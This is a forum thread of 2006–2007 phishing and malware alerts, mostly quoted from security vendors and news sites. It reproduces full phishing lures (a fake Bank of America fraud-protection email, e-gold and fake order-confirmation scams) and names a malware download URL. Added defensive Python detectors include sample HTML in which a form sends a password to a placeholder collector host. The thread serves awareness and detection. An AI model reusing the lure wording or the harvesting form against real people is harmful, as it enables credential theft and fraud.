Bank of America' in collaboration with ALL the banks around the world which offers services of transactions through the internet and not only and several institutions against frauds launched a revolutionary program called SFN (Stop Fraud Now)'.
By registering on SFN your card is protected 99.99%. You probably wonder why we say that the chances of suffering a loss are 0. The moment you register you will receive a code which contains an international unique code (IUC). This code arrives to the bank which your card was released from. This way your card can't be cloned without knowing this code. Only the issuer bank can reproduce your card in case you loose it or has been stolen. Also you have many options from your account. On-line assistance through chat or virtual phoning (skype) non-stop and also the possibility of blocking your account through the push of a button anytime you find anything suspicious about it. You can unblock it as easy after solving the issues. Another helpful option you can find it in the internet Online section. There you have two buttons On-line and Off-line which allows y! ou to keep your card off-line for transactions and to active it only when you wish to shop or make a transaction. We guarantee it's a 100% efficient and secure program and monitored 24 hours a day, 365 days a year.
Click here < LINK REMOVED > to see the list of banks which support SFN program | Click here < LINK REMOVED > to visit our website for more informations!
JOIN NOW FOR MORE PROTECTION!
Your card no longer can be cloned!
Your card is monitored non-stop for a period of 356 days preventing suspicious transactions on the internet but also from the bancomat!
You have free assistance from our team anytime you're unclear about our services!
Once you created your account you can set your card to on-line or off-line for internet transactions! This option offers you 100% ASSURANCE that ONLY YOU are able to use the card for online transactions!
The chances of being a victim of a material loss is 0.01% and in the case supposing our system didn't work at the efficiency we promised, we guarantee 100% that your money will be recovered!
This service is offered by Bank of America in association with European Central Bank and National Australian Bank The project is of federal nature and is protected by the Federal Bureau of Investigation (FBI) and the National White Collar Crime Center (NW3C).
It is 100% FREE !
For more information about this program visit our website
< URL REMOVED >
Bank of America
Electronic Banking Services
CA4-701-02-75
P.O. Box 37000
San Francisco, CA 94137 ..."


(Phishing Screenshots available at the URL above.)

:ph34r:



#75 quietman7

Posted 12 July 2006 - 12:38 PM

Man-in-the-middle phishing

The first ever case of using a man-in-the-middle attack against an online bank was reported by Brian Krebs of Security Fix on Tuesday.

The security industry has long predicted this type of man-in-the-middle attack; it was only a matter of time. The attack targeted Citibank's Citibusiness service and was designed to spoof the token key hardware device used by the bank's customers. The phishing site checked the logon credentials with the real site before rendering the results to the phishing victim. Enter an invalid password, and you got an invalid logon page. A man-in-the-middle attack checks everything done at the phishing site against the original, so everything should look and feel more genuine.

Exactly the same kind of attacks can be used to target other types of two-factor authentication, including one-time password sheets.

f-secure.com/weblog

#76 AplusWebMaster

Posted 12 July 2006 - 08:02 PM

FYI...

Recent Two factor authentication attacks
- http://isc.sans.org/...hp?storyid=1478
Last Updated: 2006-07-12 23:04:15 UTC
"There has been a recent report* of two factor authentication protected websites getting attacked by the man-in-the-middle type of setup, where the victim enters information (including the token code) into a look-alike website, and this look-alike website immediately uses those credentials to log in to the actual financial site. Obviously, upon successful login by the user, the attacker can immediately execute the fraudulent transaction. While this might sound shocking to the financial industry since we haven't seen too many of these attacks, the theory of the attack and the risk have certainly been well understood within the security community**... Overall, two factor authentication will reduce the risk of attacks by raising the effort of the attacker to compromise the accounts, but it might not have the level of security enhancement that some people believed. In the man-in-the-middle attack, the flaw happens due to the lack of verification of the bank's website by the victim; the victim is simply tricked into yielding credentials to a web site without authentication. This is really outside of the protection zone of the extra authentication factor.
To further extend this, two factor authentication also does NOT protect the end host security: malware (such as a keylogger or BHO) could be installed on the client's machine and effectively gather the credentials and log in on behalf of the victim instead of letting the victim log in. This is a classic problem of "you are only as secure as the weakest link". Two factor authentication is good for secure authentication but does not take care of mutual authentication or endpoint security. From the financial organization's perspective, maybe further investment into mutual authentication and ensuring the client's computer is free of malware would be necessary to protect the client's online transactions."

* http://blog.washingt..._2factor_1.html

** http://www.networkse...rAuthentication

:huh:



#77 AplusWebMaster

Posted 20 July 2006 - 02:29 PM

Good grief.

IRS refund... (phish)
http://isc.sans.org/...hp?storyid=1500
Last Updated: 2006-07-20 17:06:54 UTC
"...A cute little Phish Mail that claims to come from the IRS (Internal Revenue Service), who are desperately trying to refund some money directly to your Visa card. All they need is your Social Security Number and the Visa card #. And, incidentally, IRS processing seems to be done in Romania (hxxp://ap[dot]ro) nowadays. Outsourcing, most likely ;o) ..."

EDIT/ADD:
- http://www.irs.gov/n...=160334,00.html
July 19, 2006
"...“The IRS does not send out unsolicited e-mails asking for personal information,” said IRS Commissioner Mark W. Everson..."
- http://www.irs.gov/n...=155682,00.html

:(

Edited by apluswebmaster, 30 July 2006 - 07:46 AM.



#78 AplusWebMaster

Posted 24 July 2006 - 06:10 AM

FYI...

E-Gold Scams
- http://isc.sans.org/...hp?storyid=1507
Last Updated: 2006-07-24 00:00:45 UTC
"Reader Ivan alerted us earlier today about an email scam that has surfaced in the past few days. Here's the text of the message he saw:

Subject: egold transaction
Message:
Good day,
Yesterday I was checking my egold account and was surprised at what I saw: I had almost 200 ounces of gold (USD 100,177.90). I never had so much money, (I only had USD177.90 in my account at he time of this transaction) I don't know how did they get there. I clicked on history and saw that money were transferred 2 hours ago, in the memo field I saw your email address:[email] When I was trying to sort this out - money disappeared from my egold account. I lost my money and money that came from nowhere. I changed my password immediately and now I am trying to find out what has happened. Luckily I made a screenshot with the transaction history for you to see and tell me what is going on. I hope that you will let me know what has happened. I did not contact egold support yet. I hope that we will be able to sort this matter ASAP. Before I will contact them.
Regards,
Jannet Johnston

Not a bad job of building a scam. As you might expect, there was a file attachment that looks fairly innocent, "screen.zip" and likely would fool many unsuspecting victims. Opening the file we find an executable file inside the archive that is named "screen.jpeg (many spaces) .exe" that in turn has a filesize of 8,485 bytes. Most of you know what happens next...
Ivan did a bit more analysis and found that the .exe file drops a .dll component that is installed as a Browser Helper Object (BHO). The dropped component also downloads mailordermarijuana.ca/images/mod.gif (careful!!) The mod.gif file (11,570 bytes) is also a .exe dropper which in turn also installs another .dll in the infected system. The second .dll looks like a Trojan-Spyware stealing e-gold account information from the users of the infected system. Handler Lenny found a blog* that seems to indicate this scam started a few days ago..."

* http://blog.findinfo...d-fraud-beware/

:eek:



#79 AplusWebMaster

Posted 24 July 2006 - 01:46 PM

FYI...

New Haxdoor variant via spoofed E-mail from ecost
- http://isc.sans.org/...hp?storyid=1508
Last Updated: 2006-07-24 14:53:45 UTC
"We received several notifications of an email being spoofed from ecost. It is being used to "socially engineer" or trick people into installing a new version of Haxdoor. This virus was largely undetected by most of the commercial antivirus vendors yesterday. We have submitted samples to most of the commercial antivirus vendors. They are responding rapidly and in many cases they are able to detect it now...

---- Text from original message -----
Dear Sir/Madam,
Thank you for shopping with our internet shop. Your order, WC2905036, has been received. Summary of your order you can see in the attachment file.
This email is to confirm the receipt of your order. Please do not reply as this email was sent from our automated confirmation system.
Please Note: There is no need to re-send your request or call our customer service department for status or tracking number, this will only delay our response time to you. Rest assured, we are making every effort to process and ship your order within 1 to 2 business days. We appreciate your understanding and patience and do value your business.
Once your order has been processed and shipped a FEDEX Tracking number will be automatically emailed to the address provided.
Please Note: Tracking information will be available in FedEx's system only after 10pm EST Monday thru Friday. If you receive a tracking number on Sunday, you will be able to track it Monday evening after 10pm EST. All orders placed including 1-2 or 2-3 business day options are shipped within 48 hours providing the merchandise is in stock.
All FedEx Ground orders will take 7-10 business days to arrive. Some packages may require a signature upon delivery. These packages will not be left without a signature. For your convenience, we will email you a FedEx tracking number on all successfully processed and shipped orders. All Plasma TVs, DVD players, Scanners, Fax Machines, Receivers, Home Theater, and Printers are not returnable after box is opened.
To insure the best handling of your order please allow 24-48 business hours for the processing and the shipping of your order. Thank you for your cooperation.
We hope you enjoy your order! Thank you for shopping with us!
----- End text from message -----


(May be similar to: http://www.symantec....-071214-4735-99
"...Backdoor.Haxdoor.N is a Trojan horse program that opens a back door on the compromised computer and allows a remote attacker to have unauthorized access. It also steals passwords and drops a rootkit that will run in safe mode, making this threat difficult to remove...")


> http://www.sophos.co...jhaxdoorcp.html
"Subject line: Confirmation for Order WC2905036"
24 July 2006 14:13:10 (GMT)

====================================

- http://isc.sans.org/...=1&storyid=1508
Last Updated: 2006-07-25 16:22:24 UTC ...(Version: 2)
"UPDATE: These are also being sent out spoofed from customercare@bestbuy.com and customercare@amazon.com..."
====================================
Yet another:

- http://msmvps.com/bl.../25/105724.aspx
"----- EMAIL TO AVOID -----
Downloader-AXM - Massively spammed on 07/24/2006
http://vil.nai.com/v...nt/v_140257.htm

From: billing support [mailto:info@walmart.com]

Subject: Your order information WC2905036
Message: Dear Sir/Madam, Thank you for shopping with our internet shop. Your order, WC2905036,has been received. Summary of your order you can see in the attachment file.
Attachment: wc2905036.exe ..."

:ph34r:

Edited by apluswebmaster, 26 July 2006 - 10:02 AM.



#80 AplusWebMaster

Posted 01 August 2006 - 04:59 PM

FYI...

- http://www.darkreadi...;WT.svl=news1_1
8.1.2006
"...A phishing email is circulating that poses as a message from service@microsoft.com and offers prize money that a recipient would claim by linking to the "Microsoft Resolution Centre," a malware site that mimics Microsoft's but has malware that then installs a Trojan on the victim's PC. The phish was first spotted by SurfControl* in Sydney, Australia over the weekend. "The Trojan will open a backdoor on the PC, allowing a remote intruder to gain access and control over the computer," says Susan Larson, vice president, threat analysis and research at SurfControl, which contacted Microsoft about the phish..."
* http://www.surfcontr...amp;mnuid=6.2.1

:(



#81 AplusWebMaster

Posted 08 August 2006 - 06:12 AM

FYI...

Phishing Alert: Data Stolen via ICMP/IE-BHO
- http://www.websense....php?AlertID=570
August 07, 2006
"Websense® Security Labs™ has received a sample of a new phishing Trojan that delivers stolen information back to the attacker via ICMP packets. Upon infection of a victim's computer, the Trojan will install itself as an Internet Explorer Browser Helper Object (BHO). The BHO then waits for the user to post personal information to a monitored website. As this information is entered by the user, it is captured by the BHO and sent back to the attacker.
The method of network transport used by the attacker makes this Trojan unique. Typically, keyloggers of this type will send the stolen information back to the attacker via email or HTTP POST, which can appear suspicious. Instead, this Trojan encodes the data with a simple XOR algorithm before placing it into the data section of an ICMP ping packet.
To network administrators and egress filters, this ICMP packet looks like legitimate traffic leaving the network. However, the ICMP packet actually contains encoded personal information entered by a user. The attackers presumably capture this packet at their remote server, where the packet is easily decoded to reveal the information entered by the user..."

.



#82 AplusWebMaster

Posted 16 August 2006 - 02:15 PM

FYI...

Brazilian Right to Vote revoked by Phish!
- http://www.websense....php?AlertID=576
August 16, 2006
"Websense® Security Labs™ has received reports of a new phishing attack that targets customers of the Brazilian Tribunal Superior Eleitoral. Users receive a spoofed email message claiming that their entry in the electoral roll has been cancelled. To learn the reason for the cancellation and be able to reinstate their right to vote at the upcoming elections, they will have to read the attached regulations. The link provided by the email leads to a download for a Trojan that installs malicious code on the user's computer. The URL leading to the malicious code is hosted in Korea and was up at the time of this Alert..."

(Screenshots available at the URL above.)

:(



#83 AplusWebMaster

Posted 02 September 2006 - 05:35 PM

FYI...

AT&T hack exposes 19,000 identities
- http://www.sfgate.co...;type=printable
September 1, 2006
"...AT&T's press release this week made no mention of the phishing aspect of the scam. But the company's internal memo warns employees to be on the lookout for phony e-mail. "Impacted customers may receive an e-mail that appears to be from AT&T but is actually from the unauthorized person requesting additional personal information such as Social Security number, driver's license number, date of birth or other credit card information," it says. AT&T's Sharp said individual customers were warned of the phishing threat in e-mail this week from AT&T. "We don't know how many people received the phishing e-mails," he said. "We indicated (to customers) that there was an apparent phishing expedition going on that was linked to this incident and was not from AT&T"..."

:eek: :grrr:



#84 AplusWebMaster

Posted 02 October 2006 - 03:14 PM

FYI...

Email Fraud Using Brazilian Gol Airlines Crash
- http://www.websense....php?AlertID=646
October 02, 2006
"Websense Security Labs™ has received reports of a fraudulent email which targets Brazilian users. Users receive an email with a link to a malicious website containing pictures of the recent Gol Airlines Boeing 737 crash in Brazil. This website contains a Trojan downloader which is used to install a banking keylogger..."

(Screenshots available at the Websense URL above.)

:grrr:



#85 AplusWebMaster

Posted 06 October 2006 - 09:34 AM

Good reference. Great charts.

- http://phishregistry.org/
"Secure Computing monitors phishing activity for over a thousand financial institutions and large online organizations using a collaborative network of over 4000 appliances... PhishRegistry.org is a free resource provided by Secure Computing, Inc. to help businesses know when they are at risk of being phished..."


;)



#86 AplusWebMaster

Posted 16 October 2006 - 02:41 PM

FYI...

Quality, quantity of phishing kits on the rise
- http://news.com.com/...g=st.util.print
Oct 16, 2006
"The marketplace for phishing toolkits, which can allow technophobe criminals to quickly and easily set up spoofed versions of banking Web sites, is booming, with kits changing hands for as little as $30. Although phishing kits are nothing new, in the past year their quantity and quality have increased dramatically, according to Dan Hubbard, vice president of security research for Websense and a representative of the Anti-Phishing Working Group. Phishing kits "have been around for years, but the volume is one of the big changes," Hubbard said. "The kits available are better designed." In particular, Hubbard noted that the kits were vaunting their immunity to common defensive techniques. These include detection by signature-based defensive programs, which look for the signature, or the "fingerprint," of known malicious software. Another is heuristics, which use pattern recognition to identify threats. "The kit makers publish and test against signature detection as part of their advertising portfolio--'not detected by antivirus, not detected by heuristics, not detected by signatures'"... "The obfuscation techniques they use are very difficult to detect with antivirus because JavaScript can be tuned, changed on the fly and every user can have a different version of the content," Hubbard said. With a kit like "Webattacker, for example, every single person who installs it has their own personal version, and each user who connects to the Web site--depending on their browser--is served up with their own exploit code," Hubbard said. "There is no consistency with regards to heuristics."

:eek:



#87 AplusWebMaster

Posted 27 October 2006 - 12:17 PM

FYI...

Scams Target Latest Upgrades in E-Banking Security
- http://blog.washingt...web_bankin.html
October 27, 2006
"Financial institutions across the country are scrambling to meet a Dec. 31 deadline set by banking industry regulators to have security processes in place for online banking that go beyond simply requiring customers to enter a user name and password. While some of the protections being adopted should help people -feel- more confident about online banking, there are signs that criminals already are adapting their techniques to defeat those measures... Take, for example, a phishing e-mail from earlier this week targeting Bank of America customers with the usual message urging the recipient to "update their account information," in this case due to a supposed "server update" by the bank. Users who click on the included link are brought to a page that prompts the visitor to reset their account data by supplying their "old" password and user name, as well as their "previous" two SiteKey questions and answers... It would be interesting to compare the results of the anti-phishing technology built into the latest releases of both Microsoft's Internet Explorer 7 and Mozilla's Firefox 2.0 browsers. When I visited this particular site in Firefox, I received a pop-up alert from Netcraft's anti-phishing toolbar, but also from Firefox, which flagged the scam site as a "suspected web forgery" and included links I could click on to learn more about phishing scams. When I visited the Bank of America scam site in IE7, I received no such alert."

:eek:



#88 quietman7

Posted 30 October 2006 - 09:36 AM

Phishing attack targets MySpace users

Phishers have found a way to use genuine MySpace.com accounts to trick users into revealing their account information.

Web analysis firm Netcraft reported on Friday that a MySpace user was emailing potential victims inviting them to visit a fraudulent login page, where they were asked to enter their email address and password. That information was then sent to a server located in France, according to Netcraft.

The attack, which has now been shut down by MySpace, took advantage of the way the site organises URLs in order to give the fake login page a believable web address...



#89 AplusWebMaster

Posted 10 November 2006 - 03:56 PM

FYI...

"Monster" Phish Bait
- http://isc.sans.org/...hp?storyid=1842
Last Updated: 2006-11-10 19:26:04 UTC
"A reader recently submitted for review a new phish attempt which asks readers to download the "new Monster Job Seeker Tool". The email looks authentic, as the HTML source code is pulling images from monster.com, as well as having links to other monster.com pages, however the download does not come from monster.com. The download software link pulls the download from monster-freesoftware.com. Of course, what is downloaded is not something monster.com would approve of. I have sent a copy of the email to abuse@monster.com for their records as well."

:angry:



#90 AplusWebMaster

Posted 11 November 2006 - 02:17 PM

FYI...

Social Security Admin warns of e-mail scam
- http://www.ssa.gov/p...hingScam-pr.htm
November 7, 2006
"The Agency has received several reports of an email message being circulated with the subject “Cost-of-Living for 2007 update” and purporting to be from the Social Security Administration. The message provides information about the 3.3 percent benefit increase for 2007 and contains the following:

“NOTE: We now need you to update your personal information. If this is not completed by November 11, 2006, we will be forced to suspend your account indefinitely.”

The reader is then directed to a website designed to look like Social Security’s Internet website... Once directed to the phony website, the individual is asked to register for a password and to confirm their identity by providing personal information such as the individual’s Social Security number, bank account information and credit card information... To report receipt of this email message or other suspicious activity to Social Security’s Office of Inspector General, please call the OIG Hotline at 1-800-269-0271. (If you are deaf or hard of hearing, call the OIG TTY number at 1-866-501-2101)..."

:evilgrin:



#91 AplusWebMaster

Posted 22 November 2006 - 07:56 AM

FYI...

MS brings 129 lawsuits against phishers
- http://preview.tinyurl.com/ymuv6e
Nov 22, 2006
"AMSTERDAM (Reuters) - Microsoft is helping law enforcers hunt down criminals who try to steal bank account details on the Internet and has initiated 129 lawsuits in Europe and the Middle East, the U.S. software company said. One court case in Turkey has already led to a 2.5-year prison sentence for a so-called "phisher" in Turkey, and another four cases against teenagers have been settled out of court, Microsoft said on Wednesday, eight months after it announced the launch of a Global Phishing Enforcement Initiative in March... Of the 129 lawsuits that have been initiated, 97 are criminal procedures in which Microsoft and other technology companies have provided information... Phishing has mushroomed over the last few years, with the number of attempts to trick citizens into handing over their bank account details almost doubling in the first half of 2006 to 157,000, according to a recent report from security software vendor Symantec... (Microsoft) has an investigative team at its headquarters in Redmond, Washington, which uses Web-crawling software and customer complaints to find out where attacks are taking place... Before legal action was taken, 253 cases were investigated. Most of the investigations and 50 of the criminal complaints were filed in Turkey. Germany was second with 28 criminal complaints and France third with 11..."

:!:



#92 AplusWebMaster

Posted 27 November 2006 - 10:33 PM

FYI...

Google flaw adds phishing hole to Web sites
- http://news.com.com/...g=st.util.print
Nov 27, 2006
"A security flaw in Google's search appliances could expose Web sites that use the products to information-stealing phishing attacks, experts warned Monday. The Google Search Appliance and Google Mini are used by organizations including banks and universities to add search features to Web sites. A flaw in the way the systems handle certain characters makes it possible to craft a Web link that looks like it points to a trusted site, but when clicked serves up content from a third, potentially malicious site. "This vulnerability affects a lot of very large Web sites," John Herron, a security expert who maintains the NIST.org site, said in an e-mail. "It basically allows a virtual defacement of a Web site when following a malicious link." The vulnerability provides cybercrooks a hook for phishing attacks, scams that try to trick people into giving up sensitive information such as credit card data and Social Security numbers. Phishing scams typically use spam e-mail with a link to a fraudulent Web site... One way Internet users can protect themselves against attacks that attempt to exploit the flaw in the Google appliances is to inspect Web links. The rigged links will be very long, according to security experts. Users of the Google appliances who have not heard from Google should contact the company for a fix. "Web site owners must be diligent about finding and fixing vulnerabilities, (since) even products supplied by well-known brands possess these extremely common issues," Grossman said."

:eek:



#93 AplusWebMaster

Posted 28 November 2006 - 10:12 PM

FYI...

Phishing by proxy
- http://isc.sans.org/...hp?storyid=1895
Last Updated: 2006-11-28 23:42:21 UTC by William Salusky
"...I had been investigating reports of phishing and miscreant web sites being hosted in specific user land network IP space, only to discover they were not in fact malicious users and in fact innocent users who had somehow been duped and computers compromised, resulting in a proxybot infection that would phone home announcing the availability of anonymous proxy redirect services offering controllable port TCP port 80 and 443 redirects to an upstream mothership. These bots/agents also offer DNS service at the phishers' whim in acting as authoritative NS targets with fast flux domain resolution techniques often found used in short lived phishing attacks or by any other type of garbageware pushers. All that functionality [in this variant] comes in an 11k footprint, and hasn't been well detected by AV vendors either. The AV vendors that do offer detection [for this specific variant I am referring to] unfortunately offer only innocuous names like "Trojan-Downloader.Win32.Small.dho", or "W32/Malware" which does nothing to improve awareness of the threat... I had received notice of various European financial services being proxied via these proxybotted agents, but by the time I had acquired malware samples the proxying for phishing sites had ceased and in its stead came a wave of Money Mule recruitment sites being redirected via these proxies. I suppose that upstream phishers ran out of individuals they could abuse in financial fraud, hence had to go on a recruitment/hiring binge. What I have found that works reasonably well in my situation to identify these infection types going forward, is to search DNS cache dumps/logs for DNS A records that point into dynamically provisioned IP space for host domain records not belonging to any typical dynamic DNS provisioning services. More often than not, an isolated and suspiciously named A record association pointing into wildly dynamic IP space [in my experience] implies that something wicked that way goes.
I looked at alerting based on discovered target ip/hostname phone home destinations, but that seems to me to be a game that only the running man can play.
It's an obviously serious issue when it comes to combatting the phish problem where a successful takedown of a reported phish site that is only proxy will just be removing one node from the farm, while the upstream mothership continues with a typically long shelf life due to the effective anonymity offered by proxybotted hosts..."

Alternative detection method:
- http://www.safer-net...tory/index.html
Updates - 17. November 2006
"...+ Win32.Small.doh..."

:ph34r:

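The DNS-cache heuristic from the ISC diary quoted above, written out as an added example (not part of the original post or of the diary): it scans constructed resolver cache lines for A records that resolve into operator-defined dynamically provisioned address blocks, skips names under known dynamic-DNS zones, and notes lure-like tokens in the remaining names. The address block, zone list, token list and log lines are all constructed assumptions.

```python
import ipaddress
from typing import Dict, List

# Constructed sample of resolver cache entries: "<name> <type> <rdata>".
# Names and addresses are made up for this example (documentation ranges).
SAMPLE_DNS_LOG = """\
www.example-bank.test. A 198.51.100.10
ppal-secure-login.test. A 192.0.2.77
myhome.dyndns-provider.test. A 192.0.2.78
cdn.static.test. CNAME edge.static.test.
update-acct-verify.test. A 192.0.2.140
ppal-secure-login.test. A 192.0.2.77
"""

# Constructed: address blocks the operator knows are dynamically provisioned
# (consumer DSL/cable pools); in practice these come from ISP or WHOIS data.
DYNAMIC_POOLS = [ipaddress.ip_network("192.0.2.0/24")]

# Constructed: legitimate dynamic-DNS zones expected to point into such pools.
KNOWN_DYNDNS_ZONES = ("dyndns-provider.test",)

# Constructed lure tokens; a flagged name carrying one is "suspiciously named".
LURE_TOKENS = ("login", "secure", "verify", "acct", "account", "update")


def in_dynamic_pool(ip: str) -> bool:
    """True if ip parses and falls inside a known dynamically provisioned block."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in DYNAMIC_POOLS)


def under_known_dyndns(name: str) -> bool:
    """True if name sits in a recognised dynamic-DNS provider zone."""
    return any(name == z or name.endswith("." + z) for z in KNOWN_DYNDNS_ZONES)


def find_suspicious_a_records(log_text: str) -> List[Dict[str, str]]:
    """A records resolving into dynamic space that are not in a dynamic-DNS zone."""
    seen = set()
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or parts[1].upper() != "A":
            continue  # only A records matter for this heuristic
        name, rdata = parts[0].rstrip(".").lower(), parts[2]
        if (name, rdata) in seen:
            continue  # cache dumps repeat entries; report each pair once
        seen.add((name, rdata))
        if not in_dynamic_pool(rdata) or under_known_dyndns(name):
            continue
        lure = [t for t in LURE_TOKENS if t in name]
        hits.append({"name": name, "ip": rdata, "lure_tokens": ",".join(lure)})
    return hits
```

Run it over a real cache dump by replacing SAMPLE_DNS_LOG with the dump text and DYNAMIC_POOLS with the pools you actually see proxybot phone-homes in; names with no lure tokens still deserve a look, since the diary's point is the isolated A record into dynamic space, not the name.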


#94 AplusWebMaster

Posted 15 December 2006 - 04:53 PM

FYI...

U.K. banking scams up 8,000 Percent in 2 Years
- http://news.bbc.co.u...ics/6177555.stm
13 December 2006
"The UK has seen an 8,000% increase in fake internet banking scams in the past two years, the government's financial watchdog has warned. The Financial Services Authority (FSA) told peers it was "very concerned" about the growth in "phishing"... The amount stolen is still relatively small but it is set to go up by 90% for the second year running, peers heard. Between January and June 2005, the number of recorded phishing incidents was 312, the Lords science and technology committee was told. The figure for the same period this year was 5,059, according to banking trade body Apacs figures. The amount of cash stolen in the first half of 2006 was £23.2m, the committee was told, and was likely to be £22.5m in the second half of the year..."

:eek:



#95 AplusWebMaster

Posted 26 December 2006 - 08:09 AM

FYI...

G-mail phish...
- http://www.viruslist...logid=208187298
December 22, 2006
"We always expect a rise in cyber crime in the holiday season. This year, for instance, we have seen a noticeable rise in spam, along with a rise in phishing. I have even received a phishing email in my Gmail mailbox – the first one in ages. The phish was nothing special; the usual notification about a new payment system for an online bank with a link to the spoofed website. What caught my eye was how Google handled the phish. The Gmail interface added a number of relevant paid advertising links to the email... I think that adding such links increases user trust in fraudulent emails. Users see that Google has included keyword-related links, so they are liable to trust the email – and fall victim to the phishing scam..."

(Screenshot available at the URL above)

:eek:



#96 AplusWebMaster

Posted 03 January 2007 - 09:45 AM

FYI...

Not Your Average Phishing Scam
- http://blog.washingt...zon_phishi.html
January 3, 2007 - "One of the first phishing scams to catch Security Fix's eye in the new year -- a counterfeit Amazon.com login page -- may set the tone for the sophistication of online schemes involving fake bank and e-commerce sites in 2007. The bogus site, which was active as of early Tuesday morning, makes use of the real Amazon.com site in an effort to fool visitors into entering their real usernames and passwords. This type of trick, known as a type of "man-in-the-middle" attack, logs the user into his or her account at Amazon.com, then it displays the data that Amazon serves up once the user is logged in. Visitors who supply bogus or otherwise incorrect usernames and passwords are shown a copy of the page Amazon users normally see if they mistype either of their credentials. The lure in this phishing attack is an e-mail that warns the recipient about supposed unauthorized activity on his or her Amazon account and directs the user to reset the account's credentials. Anyone who enters a real Amazon username and password is asked to provide their date of birth, address and Social Security number. Security Fix first learned of this scam site from Paul Laudanski of Castlecops.com..."

(Screenshot available at the URL above.)

:!:



#97 AplusWebMaster

Posted 03 January 2007 - 11:36 AM

FYI...

Locating new phishing sites
- http://www.f-secure....7.html#00001067
January 3, 2007 ~ "Phishing sites are easy to locate once the bad boys start spamming out thousands of mails linking to their site. But how can such sites be found before that?... At the time of posting this entry, none of the common browsers (IE, Firefox, Opera) detected this site as a phishing site with their built-in filters. Soon they will."

Flash Phishing
- http://www.f-secure....7.html#00001066
January 3, 2007 ~ "We've now seen several phishing web sites that are using flash-based content instead of normal HTML. Probably the main reason to do this is to try to avoid phishing toolbars that analyze page content. Two recent examples, both targeting PayPal: ... ppal-form-ssl. com and ... welcome-ppl. com . These sites look like the real PayPal front page, but they are actually Flash recreations..."

(Screenshots available at the URLs above.)

:eek:



#98 AplusWebMaster

Posted 10 January 2007 - 03:15 PM

FYI...

RSA Alert: New Universal Man-in-the-Middle Phishing Kit Discovered
- http://www.rsasecuri...asp?doc_id=7667
January 10, 2007 — "RSA, The Security Division of EMC, announced today that its 24x7 Anti-Fraud Command Center (AFCC) has uncovered a new phishing kit being sold and used online by fraudsters. This new kit, a Universal Man-in-the-Middle Phishing Kit, is designed to facilitate new and sophisticated attacks against global organizations in which the victims communicate with a legitimate web site via a fraudulent URL set by the fraudster. This allows the fraudster to capture victims' personal information in real-time.
How it works
Using the Universal Man-in-the-Middle Phishing Kit, the fraudster creates a fraudulent URL via a simple and user-friendly online interface. This URL communicates with the legitimate website of the targeted organization in real-time - whether it is the online banking site of a financial institution, the order tunnel of an ecommerce company, or any other such business transacting with its users online. The victim receives a "standard" phishing email, and when clicking on the link s/he is directed to the fraudulent URL. The victim then interacts with genuine content from the legitimate website - which has been "imported" by the attack into the phishing URL - thus allowing the fraudster seamless, invisible and immediate access to the victim's personal information..."

:eek:



#99 AplusWebMaster

Posted 12 January 2007 - 08:39 PM

FYI...

New MySpace Phish using CSS
- http://www.websense.....php?BlogID=104
Jan 12 2007
"This afternoon we discovered another attack on Myspace. MySpace users receive a message in their profile from someone called "Arnelle" with the following text:
"this chick is using like almost all of ur pix and part of ur profile.. people have no lives, i swear. heres the URL if u want to check it out"
Followed by a link to their Myspace page. The page itself is hosted within the Myspace.com domain and is a user's profile page. Upon accessing the site the user is presented with their login credentials. A couple of things to note here. The code writer took special note to change the authentication picture to show that it says, “profile.myspace.com” instead of “login.myspace.com” as it normally should. One mistake the code writer made was that he did not create a password field which hides the password while the end user types it in. The attacker used code within a Cascading Style Sheet (CSS) to overlay the main user profile and present their own text and images. If users enter their credentials the information is posted to a website which is hosted in the United Kingdom..."

(Screenshots available at the URL above.)

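A defender-side audit of user-supplied profile markup for the three indicators Websense describes above (a CSS overlay covering the real page, a login-looking form posting off-site, and a password field that is a plain text input), as an added example that is not part of the original post, of Websense's write-up or of MySpace's code. The sample markup, the trusted host list and the heuristics are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse

# Constructed profile markup mirroring the described attack: user CSS that
# overlays the real page plus a login-looking form that posts off-site.
SAMPLE_PROFILE_HTML = """
<style>
.overlay { position:absolute; top:0; left:0; width:100%; height:100%; z-index:9999 }
</style>
<div class="overlay">
  <form action="http://collector.example.test/post.php" method="post">
    Password: <input type="text" name="password">
    <input type="submit" value="Login">
  </form>
</div>
"""

# Constructed: the only hosts a form inside a profile may submit to.
TRUSTED_FORM_HOSTS = ("profile.example-social.test", "login.example-social.test")
# Positioning that lets user CSS cover the site's own chrome.
OVERLAY_CSS = re.compile(r"position\s*:\s*(absolute|fixed)", re.IGNORECASE)


class ProfileAuditor(HTMLParser):
    """Collects indicators of a CSS-overlay credential-harvesting form."""
    def __init__(self):
        super().__init__()
        self.findings: List[str] = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "style":
            self._in_style = True
        elif tag == "form":
            host = (urlparse(a.get("action", "")).hostname or "").lower()
            if host and host not in TRUSTED_FORM_HOSTS:
                self.findings.append(f"form posts off-site to {host}")
        elif tag == "input":
            name = a.get("name", "").lower()
            if "pass" in name and a.get("type", "text").lower() != "password":
                self.findings.append(f"credential field '{name}' is a visible text input")

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style and OVERLAY_CSS.search(data):
            self.findings.append("stylesheet uses overlay positioning")


def audit_profile(html: str) -> List[str]:
    auditor = ProfileAuditor()
    auditor.feed(html)
    return auditor.findings
```

Any non-empty result is a reason to hold the profile for review; the off-site form action alone is the strongest signal, since user content on the site's own domain has no legitimate reason to send credentials elsewhere.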


#100 AplusWebMaster

Posted 15 January 2007 - 09:05 AM

FYI...

Phishing By The Numbers: 609,000 Blocked Sites...
- http://news.netcraft...es_in_2006.html
Jan 15, 2007 ~ "The Netcraft Toolbar blocked more than 609,000 confirmed phishing URLs in 2006, an enormous jump from just 41,000 in 2005. The volume of attacks grew gradually until the final quarter of the year, when the number of blocked sites soared as attackers perfected techniques to automate and propagate networks of spoof pages. These networks were replicated across botnets, creating a huge jump in submissions and confirmed phishing sites. Blocked URLs ranged between 1,000 and 20,000 per month before ramping up to 45,000 in October, 135,000 in November and more than 277,000 in December... The dramatic surge in attacks was fueled by new tools to rapidly deploy entire networks of phishing sites on cracked web servers. These packages, known broadly as Rockphish or R11, each included dozens of sites spoofing major banks... 942 institutions were targeted in 2006, including banks and credit unions of all sizes, online payment gateways, e-commerce retailers, social networking sites, ISPs, online games and government agencies..."

> http://toolbar.netcraft.com/

:!:

